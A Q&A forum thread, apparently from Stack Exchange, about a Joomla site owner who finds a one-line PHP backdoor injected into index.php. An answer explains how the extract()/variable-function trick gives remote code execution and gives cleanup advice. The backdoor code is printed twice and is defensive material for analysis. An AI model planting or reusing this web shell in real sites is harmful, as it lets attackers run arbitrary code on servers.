# Code Inserted into Site

Tags: php, security

We received an e-mail notification from our web site last night telling us that a core Joomla file had been modified.

Upon inspection, I found this code in our root/index.php file:

```
if (isset($_REQUEST["mjzM"])) {/*AlbqD*/@extract($_REQUEST);/*EYGfjEzF*/@die($mjzM($NAQGb));}
```

Could someone explain what it is please and what it does?

Comment: Just our of curiosity - what version of Joomla are you using?

Comment: Given the timing, your website may have been exploited due to a recently patched vulnerability. It's important to update to Joomla 3.4.6 to fix the vulnerability. See https://developer.joomla.org/security-centre.html for the latest information on security updates. Note that patches for the end-of-life Joomla 1.5 and 2.5 series have also been released and you can find these at: https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions. As Lodder points out, applying the patches will fix the vulnerability but you'll still need to clean up any infection.

Answer (score 6):

Looking at the code, it doesn't really make sense on it's own.

Lets look at what we currently have:

```
if (isset($_REQUEST["mjzM"]))
{
    @extract($_REQUEST);
    @die($mjzM($NAQGb));
}
```

**Line 1** is checking to see if `$_REQUEST["mjzM"]` is set. Now `$_REQUEST` should not really be used as it contains the content of `$_GET`, `$_POST` and `$_COOKIE`, so it is possible that a 3rd party extension containing a form has been compromised.

**Line 2** extracts `$_REQUEST`, which is an array, but it does it
   silently using `@`, meaning that if there are any errors executing
   this code, the errors won't display.

**Line 3** terminates the execution of the script and dumps the results, again, being done silently. `$mjzM` and `$NAQGb` are populated from `$_REQUEST` and could be populated from the URL easily (as `$_REQUEST` contains the data from `$_GET`.

Read a little more on the matter here:

https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

#### What should I do?

- Make sure your Joomla site is updated to the latest version, currently **3.4.6**
- Download a fresh copy of the exact version of Joomla you're using. Copy and paste the **index.php** from the downloaded zip to replace yhe one on your site.
- Ensure *all* 3rd party extensions are up to date.

Please bare in mind, that this may not be the only malicious code that has been injected into your site, there could be, and most probably is more.

Phil Taylor who is a Joomla expert and specialises Joomla security would be the a great person to have your site checked over:

https://fix.myjoomla.com/

**Disclaimer:** I'm not affiliated with Phil Taylor in any way. I've recommended him as he is highly recommended in the Joomla community.